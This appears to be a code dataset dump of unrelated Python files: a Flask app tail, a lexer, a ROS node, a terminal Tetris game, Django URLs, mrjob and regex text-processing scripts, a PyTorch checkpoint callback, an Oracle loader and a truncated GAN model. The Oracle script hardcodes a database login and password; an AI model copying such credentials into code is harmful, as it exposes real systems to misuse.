'__main__':\n app.run(debug=True, host='0.0.0.0')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"106744099","text":"import re, string\n\ntokenTypeHashMap = {\n \"<\": \"iC\", # iC stands for index changer\n \">\": \"iC\", # iC stands for index changer\n \"+\": \"op\",\n \"-\": \"op\",\n \"=\": \"op\",\n \"[\": \"bS\", # bS stands for bracket start\n \"]\": \"bE\", # bE stands for bracket end\n \".\": \"I/O\", # I/O is the input / output stream \n \",\": \"I/O\" # I/O is the input / output stream\n}\n\n# ---------------------------------------- Token Class ----------------------------------------\n\nclass Token:\n\n def __init__ (self, v: str, t: str):\n \"\"\" The class takes the following arguemnts: \n - v: value\n - t: type (ID's, Opperations, Structures ext.)\n \"\"\"\n self.value = v\n self.type = t\n \n def __repr__ (self):\n \"\"\" Simpely returns the type and value of the token \"\"\"\n return (\"Type: {0}, Value: {1}\".format(self.type, self.value))\n\n# ---------------------------------------- Lexer Class ----------------------------------------\n\nclass Lexer:\n \n def __init__ (self):\n \"\"\" Initialise the Lexer Class \"\"\"\n self.tokens = []\n\n def convertToTokenList (self, data: str) -> [Token]:\n \"\"\" Converts a data string to a token list \"\"\"\n self.tokens = []\n \n # 1. Split the data into a list of substrings (aka lines)\n lines = re.findall(r\".+\\n\", data)\n \n # 2. Remove the spaces \n lines = [re.sub(r\"\\s+\", \"\", line) for line in lines]\n\n # 3. Figure out the operation\n for line in lines:\n if (line[0] == \"+\"):\n # Slit the string into two different sections one operation part and one number part\n op, num = line[0], re.findall(r\"\\d+\", line)\n if (num == []):\n num = [1]\n self.tokens.append([Token(op, tokenTypeHashMap[op]), Token(num[0], \"num\")])\n elif (line[0] == \"-\"):\n # Slit the string into two different sections one operation part and one number part\n op, num = line[0], re.findall(r\"\\d+\", line)\n if (num == []):\n num = [1]\n self.tokens.append([Token(op, tokenTypeHashMap[op]), Token(num[0], \"num\")])\n \n elif (line[0] == \"=\"):\n # Slit the string into two different sections one operation part and one number part\n op, num = line[0], re.findall(r\"\\d+\", line)\n if (num == []):\n num = [0]\n self.tokens.append([Token(op, tokenTypeHashMap[op]), Token(num[0], \"num\")])\n\n elif (line[0] == \"<\"):\n # Save the the instruction in the tokens list\n self.tokens.append([Token(line[0], tokenTypeHashMap[line[0]])])\n \n elif (line[0] == \">\"):\n # Save the the instruction in the tokens list\n self.tokens.append([Token(line[0], tokenTypeHashMap[line[0]])])\n \n elif (line[0] == \".\"):\n # Save the the instruction in the tokens list\n self.tokens.append([Token(line[0], tokenTypeHashMap[line[0]])])\n\n elif (line[0] == \",\"):\n # Save the the instruction in the tokens list\n self.tokens.append([Token(line[0], tokenTypeHashMap[line[0]])])\n\n else:\n raise ValueError(\"Line ({0}) connot start with ({1})\".format(line, line[0]))\n \n [print(t) for t in self.tokens]\n return self.tokens\n ","sub_path":"src/Lexer.py","file_name":"Lexer.py","file_ext":"py","file_size_in_byte":3507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"117504557","text":"#!/usr/bin/env python\r\nimport rospy\r\nfrom sensor_msgs.msg import LaserScan\r\nfrom std_msgs.msg import Float32MultiArray\r\nfrom object_detector import ObjectDetector\r\n\r\ndef lidar_callback(self, msg):\r\n# msg.ranges #常時360個の配列となる\r\n# msg.angle_min # スキャンの開始角度[rad] 常時約-3.14radとなる\r\n# msg.angle_max # スキャンの終了角度[rad] 常時約3.14radとなる\r\n# msg.angle_increment # 計測間隔[rad] 常時0.017rad = 1degreeとなる\r\n# msg.range_min # 最小検出距離[m] 常時約0.15mとなる\r\n# msg.range_max # 最大検出距離[m] 常時約12.00mとなる\r\n objdtct = ObjectDetector()\r\n dist_list = objdtct.GetObject2D(msg.ranges)\r\n pub.publish(dist_list)\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n rospy.init_node('drive_mod')\r\n rospy.Subscriber(\"rplidar_scan\", LaserScan, lidar_callback) \r\n # 1: name of the Topic, 2: data type of the topic 3: callback func\r\n pub = rospy.Publisher('ptop_distnce', Float32MultiArray, queue_size = 1)\r\n\r\n rate = rospy.Rate(10)\r\n while not rospy.is_shutdown():\r\n rate.sleep()","sub_path":"drive_manager.py","file_name":"drive_manager.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"56686169","text":"import terminalgame\nimport random\nfrom terminalgame.Rect import Rect\nfrom terminalgame.locals import *\nfrom terminalgame.Surface import Surface\nimport time\nCOLORS = ('o', '#')\n# 模板的宽高\nTEMPLATEWIDTH = 5\nTEMPLATEHEIGHT = 5\nfallFreq = 0.27\n# 形状_S(S旋转有2种)\nS_SHAPE_TEMPLATE = [['.....',\n '.....',\n '..OO.',\n '.OO..',\n '.....'],\n ['.....',\n '..O..',\n '..OO.',\n '...O.',\n '.....']]\n\n# 形状_Z(Z旋转有2种)\nZ_SHAPE_TEMPLATE = [['.....',\n '.....',\n '.OO..',\n '..OO.',\n '.....'],\n ['.....',\n '..O..',\n '.OO..',\n '.O...',\n '.....']]\n\n# 形状_I(I旋转有2种)\nI_SHAPE_TEMPLATE = [['..O..',\n '..O..',\n '..O..',\n '..O..',\n '.....'],\n ['.....',\n '.....',\n 'OOOO.',\n '.....',\n '.....']]\n\n# 形状_O(O旋转只有一个)\nO_SHAPE_TEMPLATE = [['.....',\n '.....',\n '.OO..',\n '.OO..',\n '.....']]\n\n# 形状_J(J旋转有4种)\nJ_SHAPE_TEMPLATE = [['.....',\n '.O...',\n '.OOO.',\n '.....',\n '.....'],\n ['.....',\n '..OO.',\n '..O..',\n '..O..',\n '.....'],\n ['.....',\n '.....',\n '.OOO.',\n '...O.',\n '.....'],\n ['.....',\n '..O..',\n '..O..',\n '.OO..',\n '.....']]\n\n# 形状_L(L旋转有4种)\nL_SHAPE_TEMPLATE = [['.....',\n '...O.',\n '.OOO.',\n '.....',\n '.....'],\n ['.....',\n '..O..',\n '..O..',\n '..OO.',\n '.....'],\n ['.....',\n '.....',\n '.OOO.',\n '.O...',\n '.....'],\n ['.....',\n '.OO..',\n '..O..',\n '..O..',\n '.....']]\n\n# 形状_T(T旋转有4种)\nT_SHAPE_TEMPLATE = [['.....',\n '..O..',\n '.OOO.',\n '.....',\n '.....'],\n ['.....',\n '..O..',\n '..OO.',\n '..O..',\n '.....'],\n ['.....',\n '.....',\n '.OOO.',\n '..O..',\n '.....'],\n ['.....',\n '..O..',\n '.OO..',\n '..O..',\n '.....']]\n\n# 定义一个数据结构存储,对应的形状\nPIECES = {'S': S_SHAPE_TEMPLATE,\n 'Z': Z_SHAPE_TEMPLATE,\n 'J': J_SHAPE_TEMPLATE,\n 'L': L_SHAPE_TEMPLATE,\n 'I': I_SHAPE_TEMPLATE,\n 'O': O_SHAPE_TEMPLATE,\n 'T': T_SHAPE_TEMPLATE}\n\n\nWINDOWWIDTH = 50#整个游戏屏幕的宽\nWINDOWHEIGHT = 50#整个游戏屏幕的高\n# 放置俄罗斯方块窗口的大小\nBOARDWIDTH = 20 \nBOARDHEIGHT = 20\nBLANK = '.' # 代表空的形状\n\nXMARGIN = 0\nTOPMARGIN = 0\nBOXSIZE = 2\n\n# board边界\ndef isOnBoard(x, y):\n return x >= 0 and x < BOARDWIDTH and y < BOARDHEIGHT\n\n# piece在当前的board里是否是一个合法可用的位置\ndef isValidPosition(board, piece, adjX=0, adjY=0):\n # Return True if the piece is within the board and not colliding\n for x in range(TEMPLATEWIDTH):\n for y in range(TEMPLATEHEIGHT):\n isAboveBoard = y + piece['y'] + adjY < 0\n if isAboveBoard or PIECES[piece['shape']][piece['rotation']][y][x] == BLANK:\n continue\n if not isOnBoard(x + piece['x'] + adjX, y + piece['y'] + adjY):\n return False\n if board[x + piece['x'] + adjX][y + piece['y'] + adjY] != BLANK:\n return False\n return True\n\ndef addToBoard(board, piece): #游戏板数据结构用来记录之前着陆的砖块。该函数所做的事情是接受一个砖块数据结构,并且将其上的有效砖块添加到游戏板数据结构中\n for x in range(TEMPLATEWIDTH): #该函数这在一个砖块着陆之后进行\n for y in range(TEMPLATEHEIGHT):#嵌套for遍历了5x5砖块数据结构,当找到一个有效砖块时,将其添加到游戏板中\n if PIECES[piece['shape']][piece['rotation']][y][x] != BLANK:\n board[x + piece['x']][y + piece['y']] = piece['color'] #游戏板数据结构的值有两种形式:数字(表示砖块颜色),'.'即空白,表示该处没有有效砖块\n\ndef getNewPiece():\n # return a random new piece in a random rotation and color\n shape = random.choice(list(PIECES.keys()))\n newPiece = {'shape': shape,\n 'rotation': random.randint(0, len(PIECES[shape]) - 1),\n 'x': int(BOARDWIDTH / 2) - int(TEMPLATEWIDTH / 2), # x居中\n 'y': -1, # y在屏幕的上方,小于0\n 'color': random.randint(0, len(COLORS)-1)}\n return newPiece\n\ndef getBlankBoard(): #创建一个新的游戏板数据结构。\n board = [] #创建一个空白的游戏板\n for i in range(BOARDWIDTH):# range(10)=[0,9] BOARDWIDTH=10 BLANK = '.' #表示空白空格\n board.append([BLANK] * BOARDHEIGHT)\n #board[0]-board[9]每一个变量的值���是20个.组成的列表 \n return board\n\ndef drawWindow(screen):\n lefttopx = int((WINDOWWIDTH - BOARDWIDTH * BOXSIZE)/2)\n lefttopy = int((WINDOWHEIGHT - BOARDHEIGHT * BOXSIZE)/2)\n global XMARGIN\n XMARGIN = lefttopx\n global TOPMARGIN\n TOPMARGIN = lefttopy\n rightbottomx = int(lefttopx + BOARDWIDTH * BOXSIZE)\n rightbottomy = int(lefttopy + BOARDHEIGHT * BOXSIZE)\n for i in range(lefttopy, rightbottomy):\n screen.image[i][lefttopx-1]='|'\n screen.image[i][rightbottomx]='|'\n for j in range(lefttopx, rightbottomx):\n screen.image[lefttopy-1][j]='-'\n screen.image[rightbottomy][j]='-' \n\ndef drawBoard(screen, board):\n drawWindow(screen)\n for x in range(BOARDWIDTH):#遍历游戏板\n for y in range(BOARDHEIGHT):\n drawBox(screen, x, y, board[x][y])#这个函数会自动找出有效方块并绘制\n\ndef convertToPixelCoords(boxx, boxy):#将游戏板上方块的坐标转化成像素坐标\n return (XMARGIN + (boxx * BOXSIZE)), (TOPMARGIN + (boxy * BOXSIZE))#XMARGIN为游戏板左顶点的横坐标,TOPMARGIN为游戏板左顶点的纵坐标\n\ndef drawBox(screen, boxx, boxy, color, pixelx=None, pixely=None):#绘制一个有效方块\n if color == BLANK: #如果这不是一个有效方块,这是5x5一个空白\n return\n if pixelx == None and pixely == None:\n pixelx, pixely = convertToPixelCoords(boxx, boxy)#将游戏板上方块的坐标转化成像素坐标\n terminalgame.draw.rect(screen, Rect(pixelx, pixely, BOXSIZE, BOXSIZE), pointtype=COLORS[color])#留出1像素的空白,这样才能在砖块中看到组成砖块\n\ndef drawPiece(screen, piece, pixelx=None, pixely=None):#pixelx, pixely为5x5砖块数据结构左上角在游戏板上的的坐标\n shapeToDraw = PIECES[piece['shape']][piece['rotation']]#PIECES[piece['shape']][piece['rotation']]为一个图形的一种旋转方式\n if pixelx == None and pixely == None: \n pixelx, pixely = convertToPixelCoords(piece['x'], piece['y'])#将砖块坐标转换为像素坐标。\n for x in range(TEMPLATEWIDTH): #遍历5x5砖块数据结构\n for y in range(TEMPLATEHEIGHT):\n if shapeToDraw[y][x] != BLANK:\n drawBox(screen, None, None, piece['color'], pixelx+(x * BOXSIZE), pixely + (y * BOXSIZE))\n\ndef isCompleteLine(board, y):#判断y行是否填满,填满返回True\n for x in range(BOARDWIDTH):#遍历该行的所有砖块\n if board[x][y] == BLANK:#如果存在空白,则没填满\n return False\n return True\n\ndef removeCompleteLines(board):#删除所有填满行,每删除一行要将游戏板上该行之上的所有方块都下移一行。返回删除的行数\n numLinesRemoved = 0\n y = BOARDHEIGHT - 1 # BOARDHEIGHT=20-1=19即从最低行开始\n while y >= 0:#注意当删除一行时y没有生变化,因为此时它的值已经更新为新的一行了\n if isCompleteLine(board, y):#如果该行填满\n for pullDownY in range(y, 0, -1): #range(y, 0, -1)范围[y,1]\n for x in range(BOARDWIDTH):\n board[x][pullDownY] = board[x][pullDownY-1]#将删除的行之上的每一行的值都复制到下一行\n for x in range(BOARDWIDTH):#删除第一行\n board[x][0]=BLANK\n numLinesRemoved=numLinesRemoved+1\n else:\n y =y- 1 #移到下一行\n return numLinesRemoved\n\nif __name__ == \"__main__\":\n terminalgame.init()\n screen = terminalgame.display.set_mode(WINDOWHEIGHT,WINDOWWIDTH,border=True)\n height = terminalgame.display.height\n width = terminalgame.display.width\n lastFallTime = time.time()#最后下落砖块的时间\n movingDown = False #没有按下向下方向键\n movingLeft = False #没有按下向左方向键\n movingRight = False #没有按下向右方向键\n board = getBlankBoard()\n fallingPiece = getNewPiece()\n clock = terminalgame.time.Clock()\n scores = 0\n while True:\n clock.tick(20)\n if fallingPiece == None:\n fallingPiece = getNewPiece()\n if not isValidPosition(board, fallingPiece):\n terminalgame.quit()\n exit()\n for event in terminalgame.event.get():\n if event.type == KEYUP:\n if (event.key == K_LEFT):#判断当前弹起的按键是否为左方向键\n movingLeft = False #是的话置为False,表示玩家不再想要让砖块朝着该方向移动。\n elif (event.key == K_RIGHT):#同上\n movingRight = False\n elif (event.key == K_DOWN):#同上\n movingDown = False\n elif event.key == K_q:\n terminalgame.quit()\n exit() \n elif event.type == KEYDOWN:\n if (event.key == K_LEFT) and isValidPosition(board, fallingPiece, adjX=-1):\n fallingPiece['x'] = fallingPiece['x'] -1 #左移\n movingLeft = True #将movingLeft变量设置为True,并且为了确保落下的砖块不会既向左又向右移动\n movingRight = False #将 movingRight设置为False\n elif (event.key == K_RIGHT ) and isValidPosition(board, fallingPiece, adjX=1): #同上\n fallingPiece['x'] =fallingPiece['x'] + 1\n movingRight = True\n movingLeft = False\n elif event.key == K_UP :\n fallingPiece['rotation'] = (fallingPiece['rotation'] + 1) % len(PIECES[fallingPiece['shape']])\n if not isValidPosition(board, fallingPiece):\n fallingPiece['rotation'] = (fallingPiece['rotation'] - 1) % len(PIECES[fallingPiece['shape']])\n elif (event.key == K_DOWN ):\n movingDown = True # movingDown设置为True\n if isValidPosition(board, fallingPiece, adjY=1):#下一个位置有效\n fallingPiece['y'] = fallingPiece['y'] +1 #移动\n\n if time.time() - lastFallTime > fallFreq:#fallFreq向下移动的速率\n if not isValidPosition(board, fallingPiece, adjY=1):#当砖块下一个位置无效时,即表示砖块当前已经着陆了。\n addToBoard(board, fallingPiece) #在游戏板数据结构中记录这个着陆的砖块\n scores += removeCompleteLines(board)# removeCompleteLines()将负责删除掉游戏板上任何已经填充完整的行,并且将方块向下推动。\n fallingPiece = None#最后我们将fallingPiece变量设置为None,以表示下一个砖块应该变为新的下落砖块,并且应该生成一个随机的新砖块作为下一个砖块。??????\n else:\n # 如果砖块没有着陆,我们直接将其Y位置向下设置一个空格,并且将lastFallTime重置为当前时间\n fallingPiece['y'] = fallingPiece['y'] +1\n lastFallTime = time.time()\n screen.fill()\n scores_sur = Surface(1,30)\n scores_image = list(\"scores: \"+str(scores))\n em_len = 30 - len(scores_image)\n em_image = [\"\" for i in range(em_len)]\n scores_image.extend(em_image)\n scores_sur.image = [scores_image]\n screen.blit(scores_sur, Rect(0,0,0,0))\n drawBoard(screen, board)\n if fallingPiece != None:#砖块没有下落到底部\n drawPiece(screen, fallingPiece)\n terminalgame.display.flip()\n terminalgame.quit()\n","sub_path":"examples/Tetris/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":13627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"191341753","text":"\"\"\"HoroCoin URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib import admin\r\nfrom django.urls import path\r\nfrom polls.views import *\r\nurlpatterns = [\r\n path('', EnterPage, name='home'),\r\n path('admin/', admin.site.urls),\r\n #path('main/',EnterPage),\r\n path('admin-panel/',adminPan),\r\n path('control-users/',panel),\r\n path('menu/',menu),\r\n path('perspage/',lk),\r\n path('spisok-zakazov/',product),\r\n path('info/',info),\r\n path('task-panel/', tasks),\r\n path('tasks/',earncoin),\r\n path('teacher/',teachpanel),\r\n path('earnmoney/',earnpan)\r\n]\r\n","sub_path":"HoroCoin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"560985254","text":"#In this implementation,each word in the dictionary is indexed by \n#its frequency of occurence and not its position in the dictionary \n#as is the case with data.py\n\nimport pandas as pd\nimport os,sys\nimport numpy as np\nimport re\nimport torch\nfrom collections import defaultdict\nfrom itertools import islice\nimport pickle\n\nimport time\n\nfrom mrjob.job import MRJob\nfrom mrjob.step import MRStep\n\n\ndef take(n, iterable):\n \"Return first n items of the iterable as a list\"\n return list(islice(iterable, n))\n\ndata={}\ncorpus=[]\n\nclass Make_Corpus(MRJob):\n def __init__(self,args):\n super(Make_Corpus, self).__init__(args=args)\n self.sentence_num=-1\n\n def mapper_get_words(self,_,sentence):\n sentence=sentence.lower()\n sentence=re.sub(r'
|
',' ',sentence)\n sentence=re.sub(r'[^A-Za-z0-9\\s]','',sentence)\n tokens=sentence.split() +['']\n self.sentence_num+=1\n\n for token in tokens:\n yield(self.sentence_num,data[token])\n\n def reducer_update_corpus(self,token,values):\n #print(token,values)\n corpus.append(list(values))\n yield ('updated','updated')\n\n def steps(self):\n return [\n MRStep(mapper=self.mapper_get_words,\n reducer=self.reducer_update_corpus)\n ] \n\nclass Make_Dictionary(MRJob):\n def __init__(self,args):\n super(Make_Dictionary, self).__init__(args=args)\n self.sentence_num=-1\n\n def mapper_get_words(self,_,sentence):\n sentence=sentence.lower()\n sentence=re.sub(r'
|
',' ',sentence)\n sentence=re.sub(r'[^A-Za-z0-9\\s]','',sentence)\n print(\"Input sentence: \",sentence)\n tokens=sentence.split() +['']\n self.sentence_num+=1\n #print(self.sentence_num)\n for token in tokens:\n yield(token,1)\n\n def reducer_update_dict(self,token,values):\n #print(token,values)\n data[token]=sum(values)\n yield (token,data[token])\n\n def steps(self):\n return [\n MRStep(mapper=self.mapper_get_words,\n reducer=self.reducer_update_dict),\n ] \n \nif __name__ =='__main__':\n start=time.time()\n Make_Dictionary(sys.argv[1]).run()\n print(\"Time to build dictionary: \",time.time() - start)\n #write the dictionary to a file\n print(take(100,data.items()))\n Make_Corpus(sys.argv[1]).run() \n pickle.dump(corpus,open(\"amazon_text_corpus2.p\", \"wb\" )) \n \n\n\n","sub_path":"AmazonFoodReviews_Dataset-master/SentimentAnalysis/mrjob_data.py","file_name":"mrjob_data.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"466650578","text":"\"\"\"Implements Model Checkpoint Callback.\"\"\"\nfrom abc import ABC\nfrom typing import Dict\n\nimport numpy as np\nimport torch\n\nfrom torchflare.callbacks.callback import Callbacks\nfrom torchflare.callbacks.states import CallbackOrder\n\n\nclass ModelCheckpoint(Callbacks, ABC):\n \"\"\"Callback for Checkpointing your model.\"\"\"\n\n def __init__(self, mode: str = \"min\", monitor: str = \"val_loss\"):\n \"\"\"Constructor for ModelCheckpoint class.\n\n Args:\n mode: One of {\"min\", \"max\"}.\n In min mode, training will stop when the quantity monitored has stopped decreasing\n in \"max\" mode it will stop when the quantity monitored has stopped increasing.\n monitor: The quantity to be monitored. (Default : val_loss)\n If you want to monitor other metric just pass in the name of the metric.\n\n Note:\n\n ModelCheckpoint will save state_dictionaries for model , optimizer , scheduler\n and the value of epoch with following key values:\n\n 1) 'model_state_dict' : The state dictionary of model\n 2) 'optimizer_state_dict' : The state dictionary of optimizer\n 3) 'scheduler_state_dict' : The state dictionary of scheduler.(If used)\n 4) 'Epoch' : The epoch at which model was saved.\n\n Model checkpoint will be saved based on the values of metrics/loss obtained from validation set.\n \"\"\"\n super(ModelCheckpoint, self).__init__(order=CallbackOrder.INTERNAL)\n self.mode = mode\n self.eps = 1e-7\n if \"val_\" not in monitor:\n self.monitor = \"val_\" + monitor\n else:\n self.monitor = monitor\n\n if self.mode == \"max\":\n self.best_val = -np.inf\n self.improvement = lambda val, best_val: val >= best_val + self.eps\n else:\n self.best_val = np.inf\n self.improvement = lambda val, best_val: val <= best_val + self.eps\n\n def checkpoint(self, epoch: int):\n \"\"\"Method to save the state dictionaries of model, optimizer,etc.\n\n Args:\n epoch : The epoch at which model is saved.\n \"\"\"\n if self.exp.scheduler_stepper is not None:\n torch.save(\n {\n \"model_state_dict\": self.exp.model.state_dict(),\n \"optimizer_state_dict\": self.exp.optimizer.state_dict(),\n \"scheduler_state_dict\": self.exp.scheduler_stepper.scheduler.state_dict(),\n \"Epoch\": epoch,\n },\n self.exp.path,\n )\n else:\n torch.save(\n {\n \"model_state_dict\": self.exp.model.state_dict(),\n \"optimizer_state_dict\": self.exp.optimizer.state_dict(),\n \"Epoch\": epoch,\n },\n self.exp.path,\n )\n\n def epoch_end(self, epoch: int, logs: Dict):\n \"\"\"Method to save best model depending on the monitored quantity.\n\n Args:\n epoch: The current epoch.\n logs: A dictionary containing metrics and loss values.\n \"\"\"\n val = logs.get(self.monitor)\n\n if self.improvement(val=val, best_val=self.best_val):\n\n self.checkpoint(epoch=epoch)\n","sub_path":"torchflare/callbacks/model_checkpoint.py","file_name":"model_checkpoint.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"557975381","text":"\"\"\"When attempting to model text, it is important to be able to ex- tract features of the text for analysis. \nA powerful tool for extracting text features (as well as for searching, replacing, and performing other text-based tasks) is Regular Expression (regex). \nFor this assignment, your job is to process features of emails sent and received by Enron employees during the investigation into fraud- ulent activity by Enron executives in the early 2000’s using regular ex- pressions. \nGiven emails from a single employee, generate the following information for each email:\nExtract the text of the email into one feature\nCreate a column labelled “worry” containing the following values: 1 if some form of the word “worry” is contained in the text of the email, 0 otherwise\nCreate a column labelled “trouble” with the following values: 1 if some form of the word “trouble” is contained in the text of the email, 0 otherwise\nCreate a column containing the number of recipients of the email\nCreate a column labelled “sent” with the following values: 1 if the email was sent by the user, 0 otherwise Submit your code, as well a csv containing the new columns, to Canvas when you complete this assignment.\"\"\"\n\n\"\"\"import the necessary packages\"\"\"\nimport pandas as pd \nimport re\n\n\n# In[59]:\n\n\n\"\"\"read the file into the main dataframe\"\"\"\ndata = pd.read_csv('Link to the file') #download the file in the same repo. Insert the local link to the file here\ndata = data.loc[:,'text'] #choose only the text column\nlength = len(data)\nlength #get the length of the dataframe\n\n\n# In[60]:\n\n\n\"\"\"To get only the text of the email. I noticed the pattern that the real text starts after nsf or PST, followed by \\n\\n\"\"\"\ntext = [] #a placeholder array\nfor i in range (0,length):\n try:\n temp = re.search(r'(?:(nsf\\n\\n|PST\\n\\n).*)((?:\\n?).*)+(.*)', data[i], re.IGNORECASE).group()[5:] \n except:\n temp = None\n #temp = re.search(r'(?:(nsf\\n\\n).*)((?:\\n).*)+(.*)',data[i])\n #temp = temp.group()\n #temp = temp[5:] \n text.append(temp)\nText = pd.DataFrame(text, columns = ['Text']) #turn it into a dataframe and name the column Text\n\n\n# In[61]:\n\n\n\"\"\"Check if the text has any variation of the word 'worry'\"\"\"\nworry = []\nfor i in range (0,length):\n test = 0\n patterns = [\"worry\", \"worried\", \"worrying\", \"worrisome\"]\n for pattern in patterns:\n if re.search(pattern, text[i], re.IGNORECASE): #search any of the item in the patterns array\n test += 1\n if test == 0:\n worry.append(0)\n else:\n worry.append(1)\n \nWorry = pd.DataFrame(worry, columns = ['Worry']) #turn it into a dataframe and name the column 'Worry'\n\n\n# In[62]:\n\n\n\"\"\"Check if the text has any variation of the word 'trouble'\"\"\"\ntrouble = []\nfor i in range (0,length):\n test = 0\n patterns = [\"trouble\", \"troublesome\", \"troubling\", \"troubled\"]\n for pattern in patterns:\n if re.search(pattern, text[i], re.IGNORECASE): #search any of the item in the patterns array\n test += 1\n if test == 0:\n trouble.append(0)\n else:\n trouble.append(1)\nTrouble = pd.DataFrame(trouble, columns = ['Trouble']) #turn it into a dataframe and name the column 'Trouble'\n\n\n# In[63]:\n\n\n\"\"\"check if the sender is Stacey White\"\"\"\ntestfrom = []\nfor i in range (0,length):\n try:\n temp = re.search(r'(?:(From:).*)', data[i], re.IGNORECASE).group()[6:] #get the From part of the emails\n except:\n temp = None\n testfrom.append(temp)\nsenttest = []\nfor i in range (0, len(testfrom)):\n test = 0\n patterns = \"stacey.white@enron.com\" \n if testfrom[i] == patterns: #check if the sender is Stacey White\n test += 1\n if test == 0:\n senttest.append(0)\n else:\n senttest.append(1)\nSent = pd.DataFrame(senttest, columns = ['Sent']) #turn it into a dataframe and name the column Sent\n\n\n# In[64]:\n\n\n\"\"\"Count how many emails there are in to, Cc and Bcc areas\"\"\"\ntestemail = [] #placeholder array\nfor i in range (0,length):\n \"\"\"This part is to get all text from To to X-From.\n There can be no '\\n\\ between To and X-From. That's why the formula has two parts\"\"\"\n try: \n temp = re.search(r'(?:(To:).*)(?:(X-From:))|(?:(To:).*)((?:\\n).*)+(?:(X-From:))', data[i]).group()[4:][:-8]\n except:\n temp = None\n testemail.append(temp)\nresult = []\nfor i in range (0, length):\n try:\n result.append(len(re.findall(r'@\\w+.\\w+',testemail[i]))) #count how many emails there are in the whole part\n except:\n result.append(0)\nEmailCount = pd.DataFrame(result, columns = ['SentEmailCount']) #turn it into a dataframe and name the column SentEmailCount\n\n\n# In[68]:\n\n\ndf = pd.concat([Text, Worry, Trouble, EmailCount, Sent ], axis=1) #concatenate the dataframes\ndf.to_csv('text.csv') #export to a csv\n\n","sub_path":"MinhDuong/Text_Python/Text_Analysis.py","file_name":"Text_Analysis.py","file_ext":"py","file_size_in_byte":4816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"96076712","text":"import cx_Oracle\nimport os\n\n\ndef LoadList(MyList):\n\ttry:\n\t\tcon = cx_Oracle.connect('DWH_JPH/axadirect@hvm0dwd7:1521/DWH_DEV')\n\t\tcur = con.cursor()\n\t\tcur.prepare('''INSERT INTO cvrtt VALUES (\n\t\t\t\t\t\t\t\tto_number(:1),\n\t\t\t\t\t\t\t\tto_number(:2),\n\t\t\t\t\t\t\t\tto_date(:3,'YYYY-MM-DD HH24:MI:SS'),\n\t\t\t\t\t\t\t\t:4,\n\t\t\t\t\t\t\t\tto_number(:5),\n\t\t\t\t\t\t\t\tto_number(:6),\n\t\t\t\t\t\t\t\tto_number(:7)\n\t\t\t\t\t\t\t\t)''')\n\t\tcur.executemany(None, MyList)\n\t\tcon.commit()\n\t\tcur.close()\n\t\tcon.close()\n\texcept:\n\t\ttry:\n\t\t\tcon.rollback()\n\t\t\tcon.close()\n\t\texcept:\n\t\t\tpass\n\t\tLoadList(MyList)\n\t\n\t\n\nif __name__ == \"__main__\":\n\n\tMyList=[]\n\t\n\t\n\twith open(\"CallCostAllocation_small.csv\",\"r\") as InFile:\n\t\tInFile.readline()\n\t\tfor i, line in enumerate(InFile):\n\t\t\tsline = line.strip().split(',')\n\t\t\tMyList.append((sline[0],sline[1],sline[2],sline[3],sline[4],sline[5],sline[6]))\n\t\t\tif i%5000 == 0:\n\t\t\t\tLoadList(MyList)\n\t\t\t\tMyList = []\n\n\tLoadList(MyList)\n\n\n\n","sub_path":"Divers_Python/Load_table_call.py","file_name":"Load_table_call.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"483259671","text":"import numpy as np\nimport torch\nimport copy, os\nfrom collections import OrderedDict\nfrom util.util import util\nfrom util.image_pool import ImagePool\nfrom .base_model import BaseModel\nfrom . import networks\nimport glob\nimport torch.nn.functional as F\nimport cv2\nfrom skimage import io\n\n\ndef norm_image(image):\n \"\"\"\n :param image: image with [H,W,C]\n :return: image in np uint8\n \"\"\"\n image = image.copy()\n image -= np.max(np.min(image), 0)\n image /= np.max(image)\n image *= 255.\n return np.uint8(image)\n\n\nclass DISAM_Model(BaseModel):\n def name(self):\n return 'DISAM_Model'\n\n def __init__(self, opt):\n super(DISAM_Model, self).__init__(opt)\n\n self.n_domains = opt.n_domains\n self.DA, self.DB = None, None\n self.real_A = self.Tensor(opt.batchSize, opt.input_nc, opt.fineSize, opt.fineSize)\n self.real_B = self.Tensor(opt.batchSize, opt.output_nc, opt.fineSize, opt.fineSize)\n\n # used metrics\n self.cos = torch.nn.CosineSimilarity(dim=0, eps=1e-8)\n self.mean_cos = torch.nn.CosineSimilarity(dim=1, eps=1e-8)\n self.L2loss = torch.nn.MSELoss()\n\n # load/define networks\n self.netG = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf,\n opt.netG_n_blocks, opt.netG_n_shared,\n self.n_domains, opt.norm, opt.use_dropout, self.gpu_ids)\n if not self.isTrain:\n self.use_two_stage = opt.use_two_stage\n if self.use_two_stage:\n self.netG_finer = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf,\n opt.netG_n_blocks, opt.netG_n_shared,\n 